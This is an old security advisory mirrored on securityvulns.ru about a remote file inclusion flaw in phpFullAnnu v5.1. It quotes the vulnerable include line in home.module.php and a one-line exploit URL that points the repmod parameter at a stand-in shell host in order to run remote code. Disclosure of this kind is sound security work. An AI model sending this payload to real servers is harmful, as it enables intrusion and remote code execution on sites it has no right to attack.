Security Advisory: phpFullAnnu <= v5.1 (repmod) Remote File Inclusion Exploit

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [SA21781] VCD-db Comments Script Insertion Vulnerability
  [SA21757] MySource Classic Equation Attribute PHP Code Injection
  Beautifier v0.1 Remote File Inclusion Vulnerability
  [Kurdish Security # 26 ] AnnonceV News Script Remote Command Vulnerability

From: SHiKaA-_(at)_hotmail.com <SHiKaA-_(at)_hotmail.com>
Date: 06.09.2006
Subject: phpFullAnnu <= v5.1 (repmod) Remote File Inclusion Exploit

#================================================================================
==============
#phpFullAnnu <= v5.1 (repmod) Remote File Inclusion Exploit
#================================================================================
===============
#
#Critical Level : Dangerous
#
#Venedor site : http://pfa.netsliver.com/download/phpfullannu-v5.1.zip
#
#Version : v5.1
#
#================================================================================
================
#Bug in : modules/home.module.php
#
#Vlu Code :
#--------------------------------
#      include($repmod.'linksdirect.module.php');
#
#================================================================================
================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/modules/home.module.php?repmod=http://SHELLURL.COM?
#
#
#================================================================================
================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : SiMooooo KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd
# Special Thx To : Str0ke
=================================================================================
=================